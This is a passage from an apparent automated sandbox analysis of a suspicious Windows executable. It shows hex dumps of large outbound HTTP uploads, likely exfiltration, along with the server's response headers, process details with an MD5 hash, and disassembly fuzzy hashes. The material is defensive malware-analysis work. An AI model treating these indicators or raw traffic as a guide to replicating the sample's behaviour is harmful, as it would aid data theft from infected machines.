                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: a1 21 c4 be fe fc 93 3e 84 c8 04 78 47 45 84 59 ba fe 43 e2 2e 30 02 ea b6 0a 40 77 58 f6 4a 5f 54 05 5d 52 8c e7 70 d1 3a 82 05 25 2c 59 4b 9c 69 f2 b4 55 c6 e8 e0 c1 b8 10 b9 a5 1d d0 37 86 5e 81 68 15 de 76 ec 4b 39 ac 22 78 d9 c0 1e 6e a6 8b 8b ca d4 d9 80 77 c4 e1 b2 2c c8 ef 4e a6 0c d7 3a 02 42 86 78 b3 56 e1 f6 46 a7 f7 03 3d cd 9d 9f de f8 88 6b 8e d5 1e 07 29 74 1b 26 f7 ef 36 39 7c f9 e6 45 e8 17 ea 32 c7 77 58 23 a3 fa c5 4e bd a9 4e ce 4e 86 8f e7 2b 7e fc f9 8f 53 b4 24 fc fa b3 a2 b8 28 10 26 b5 f8 e6 a4 ad 27 6f ea e2 d5 d7 c4 e9 de 4e 0b 37 b8 f1 b1 88 a0 f2 ac 68 e3 c2 a9 30 a8 ec 11 75 9f 8a 87 1b eb c1 98 8c df 53 46 f8 68 e3 b8 08 bf 09 37 c1 4d 07 a4 19 33 eb de 1e 0f 3f e5 cc 64 61 e9 a8 0e d9 bc 57 ca 81 00 ce 19 11 c4 26 04 35 44
                                                                                                                Data Ascii: !>xGEYC.0@wXJ_T]Rp:%,YKiU7^hvK9"xnw,N:BxVF=k)t&69|E2wX#NNN+~S$(&'oN7h0uSFh7M3?daW&5D
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: 15 ae 88 ec c0 8f f5 b4 71 48 1b 77 35 56 e9 86 1e 1b a5 06 3c bc 0c 76 f6 6c 1b 8e ee 31 b1 d6 63 5d 98 c4 8b 27 52 5c 44 13 c3 1a f5 27 25 50 d7 85 5d 73 97 55 c7 64 4a 52 52 7c 35 0f 4c 24 17 dd d5 46 a9 c8 af 97 6e 57 96 42 ad 7d a4 36 c8 4e d2 b3 9a 38 a3 26 f2 f0 c0 1d fa 29 55 08 ec 5b 12 a1 d6 6c e0 f0 21 9e 10 dd a8 16 f8 ce bc 67 af dd 57 bb 31 51 30 39 90 34 f1 12 10 f6 31 2e 48 31 e6 1b f7 fa 11 da 3e c3 27 f8 46 00 e3 22 02 a1 9e e0 e0 3b 50 ab 04 28 47 fc 20 00 fa 3d 18 ae 1e f3 48 39 12 fc e1 b2 4d 49 18 2b c3 d3 3e 7f 63 5d e4 20 a9 9c 1b 7f 97 7c 8e c6 2c 70 6a ae 5a eb fb a1 1c fe 97 a7 98 6b ba 9e 59 a0 90 b8 de 8c 26 4b 0a 98 3d 9c 5d d9 ae 32 ba 67 50 c4 6b b5 c6 53 fd 8c fb d7 6a 76 7a d5 62 e6 c4 20 7b 41 8f 4b 4d 96 6a e0 7d 72 2a
                                                                                                                Data Ascii: qHw5V<vl1c]'R\D'%P]sUdJRR|5L$FnWB}6N8&)U[l!gW1Q0941.H1>'F";P(G =H9MI+>c] |,pjZkY&K=]2gPkSjvzb {AKMj}r*
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: 6e 29 ed 04 29 cc bb 29 36 e7 a8 e5 5b 1b 04 77 2d 17 6b 83 73 5f 71 df 6c 7f f6 44 85 c4 ef f9 31 87 05 0a 13 f3 a2 0c 51 cc f5 e6 5a d3 be 5e 2f c5 30 15 87 5c 58 b3 75 2e e7 90 8a c0 ce c5 75 3f 3e ca ab 55 69 46 b2 3f f4 4e 99 c4 c2 00 d1 f5 ed 20 b6 cc 78 e9 ca 72 cd ed f9 3b dc 39 8f 47 17 30 20 91 5a b3 b1 da 4a 35 fd 0d 98 68 65 ae f3 a9 4f 5b b9 ca 0b 6f 35 45 3a 87 bb 34 11 ad 57 3c 4f 93 a6 12 66 d6 17 37 92 71 e3 20 7c 66 6a c1 b2 b4 cf a5 99 4e 9b e2 03 54 f6 73 1f 40 41 6d ac 41 54 01 40 3b 0d d1 45 83 c1 7c 8b 1f 38 2e 02 1c 68 1a dc a1 ad ce a1 4b 41 39 f3 34 93 9b 68 e6 ca c0 3f 01 d2 f6 13 a8 3b bc a1 17 71 9f 9c 80 ad 59 16 bd c6 90 42 51 8f 36 23 23 f4 e0 e6 c5 7b 93 94 03 d5 21 36 07 de 79 da f7 ee ad 6c 87 6a 2c 85 d0 33 4b 23 a4 be
                                                                                                                Data Ascii: n)))6[w-ks_qlD1QZ^/0\Xu.u?>UiF?N xr;9G0 ZJ5heO[o5E:4W<Of7q |fjNTs@AmAT@;E|8.hKA94h?;qYBQ6##{!6ylj,3K#
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: a6 88 cd b2 e3 e1 5a 7b 6d 1d a6 da d4 57 c8 8b cb aa ee 93 df 16 50 58 49 db 90 1f 2a 06 85 cb 73 78 b1 dc 83 a2 b6 4d 57 46 02 eb 12 05 ab 97 50 70 94 ac d9 36 82 f6 83 bf fa 10 a2 e1 13 02 68 e2 29 47 56 90 59 4a e0 f4 4b 32 c8 86 d5 31 9c 4d 08 4e 25 92 05 37 cf ec 03 bd 3a 63 bf 5e 3d 0b 83 6d a4 c1 85 18 c8 06 af f3 02 e4 2b e3 06 fe d2 cd d6 96 02 4d 92 14 31 30 2b 0a b5 42 a4 08 aa d9 0f e1 9c 0b 44 6b 31 ce e5 c8 34 9f 0d 9f 0b dc 44 66 c9 e1 f1 e2 bd 86 43 42 98 03 d8 e6 e3 61 aa a8 d3 9a 90 00 b3 a0 9e 18 03 da 36 07 6a 47 52 ce 92 10 e5 97 c4 85 21 22 3c 80 1d 87 7e bc 6f 54 4c c0 02 5e 48 4c f1 e1 55 f8 33 40 11 f3 ef 37 7d 40 41 ef 15 42 a2 51 f0 34 b8 04 b2 0b 38 58 e6 7f 26 bb a3 23 14 4a 15 09 7a e8 9f 73 59 40 03 18 94 e6 c5 99 c4 a2 ad
                                                                                                                Data Ascii: Z{mWPXI*sxMWFPp6h)GVYJK21MN%7:c^=m+M10+BDk14DfCBa6jGR!"<~oTL^HLU3@7}@ABQ48X&#JzsY@
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: fe a6 5d 70 f1 6f a5 9e d5 e4 83 d0 6d 19 ff 7b 7c 92 ad 41 44 1b d4 eb 02 0e 7e 0b dd 9b fc a7 2a b8 2e c4 47 30 bd 81 ca 8b fb fc 6e ae 4a b4 5a fe 4d 0f 0e c1 0b 7d 5a 11 6a bc 6a 3e 20 1f 27 c5 39 7e 24 49 11 85 da df 95 ad 6e 17 84 43 b9 a6 95 a9 1e 41 21 d7 33 c4 24 67 74 f6 f1 f3 bb 57 60 b7 bd 5b e5 7b f0 13 6f b7 f2 d6 0f 70 18 9b 41 ee 42 0c 1d 6d 4b bb 90 70 6a 2f f7 af 3d 8c 47 90 44 43 ba d6 d5 64 82 a4 b6 f7 b0 92 7d e8 41 ee e3 10 83 87 89 61 c8 77 53 e4 af ab 24 cd 1b cf be f0 a7 4f ff f7 da 53 36 12 cf 45 44 ad c8 4b 92 d8 fc c6 ec 3c f1 e0 fd a2 28 80 9a cd bc a8 d1 cc 8e 66 98 3e 89 d4 db 7c 5d ab 6e c5 5f e3 d5 8a 7c a3 94 c0 58 35 f4 26 08 ef 9f 0e 34 69 95 94 f9 f7 18 fc a9 3f 9e 92 f0 89 a6 82 7d ef ef b7 2e bf 6e 27 4b 93 23 ca 0f
                                                                                                                Data Ascii: ]pom{|AD~*.G0nJZM}Zjj> '9~$InCA!3$gtW`[{opABmKpj/=GDCd}AawS$OS6EDK<(f>|]n_|X5&4i?}.n'K#
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: ee 52 11 1f cf e9 4c ec 3f bd 92 2c 2b 76 a8 6e d7 a1 9b 3b d2 70 29 77 44 4e 4f 6a 14 89 ce ed 7e 57 e3 b7 7e bd 2f 29 ec d2 6b 4c 6f 94 ac 3c c4 ab 78 eb ed 17 c3 4b a0 6e fa 51 a8 39 67 f0 a3 2c 87 d7 5f 36 b0 1e e1 db 76 13 bb f2 bd 41 74 9c bd 73 70 a0 41 cc 03 af 14 de 46 ed 52 a6 fe 38 fb 63 13 e0 0d 7e da 30 2b a5 1b 3a f0 2e 94 1b 3c 9b 8d 96 2f ed 3c a7 3c e7 7c 73 78 27 7b f2 74 67 45 32 6e 75 1b 7b cd 62 a1 af 1c 5d 33 e3 5c c3 d6 28 99 a8 95 ed 1d 8d b1 11 07 ac 77 96 d5 7f 06 07 0e 0b 81 90 e9 9f 00 0c 04 fd f1 9c 65 1f 0f 13 d0 25 3d 13 60 dc 8c 64 0c 08 42 c4 84 13 9e 45 ff 68 28 99 cd f6 36 01 06 1b ff 05 8f 25 d7 31 ff 6f b9 83 36 44 de 88 ba f1 f3 e0 53 d1 8d 58 c5 de f0 94 2d 06 38 3d 94 89 b8 23 cb e6 aa 42 58 83 84 76 34 12 3b 4b 52
                                                                                                                Data Ascii: RL?,+vn;p)wDNOj~W~/)kLo<xKnQ9g,_6vAtspAFR8c~0+:.</<<|sx'{tgE2nu{b]3\(we%=`dBEh(6%1o6DSX-8=#BXv4;KR
                                                                                                                2024-12-19 07:36:52 UTC1127INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=82gctt35iesdam94copc6tm49g; expires=Mon, 14 Apr 2025 01:23:31 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FoorjkvkVrhPZqg4XkVUotwJSKI%2BKxloxCSouuZ%2FERU7trbk0CsmcCqZOXj7xOWLp0AuoHHiLkzsljnNmdhyBqC9VXauRRn3E4dhi7jwrXpU9mv2jNTWAUezJ6dgH%2Be"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b94d08250cae-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1565&rtt_var=599&sent=352&recv=608&lost=0&retrans=0&sent_bytes=2830&recv_bytes=587460&delivery_rate=1806930&cwnd=252&unsent_bytes=0&cid=7e575a0b9caa6a15&ts=3357&x=0"


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:02:36:29
                                                                                                                Start date:19/12/2024
                                                                                                                Path:C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\661fW9gxDp.exe"
                                                                                                                Imagebase:0xdb0000
                                                                                                                File size:1'841'664 bytes
                                                                                                                MD5 hash:18C608E128D658AEF6E267668DDB68E2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00C6E6DC Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1575977746.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, Offset: 00C69000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_c69000_661fW9gxDp.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: z
                                                                                                                  • API String ID: 0-1657960367
                                                                                                                  • Opcode ID: 72383e81d9725a0467a36b7e8c0513bf7cdc0f4defb17823d62a8dd52804f3ac
                                                                                                                  • Instruction ID: 7e659044b3c521ff6149bfea8480ee39759c09b3aa7321665f4fd0f0a968be21
                                                                                                                  • Opcode Fuzzy Hash: 72383e81d9725a0467a36b7e8c0513bf7cdc0f4defb17823d62a8dd52804f3ac
                                                                                                                  • Instruction Fuzzy Hash: 0A71679540E7D54FD3235BB849A96857FB09E27264B1E46DBC0E0CF1F3E259094AC723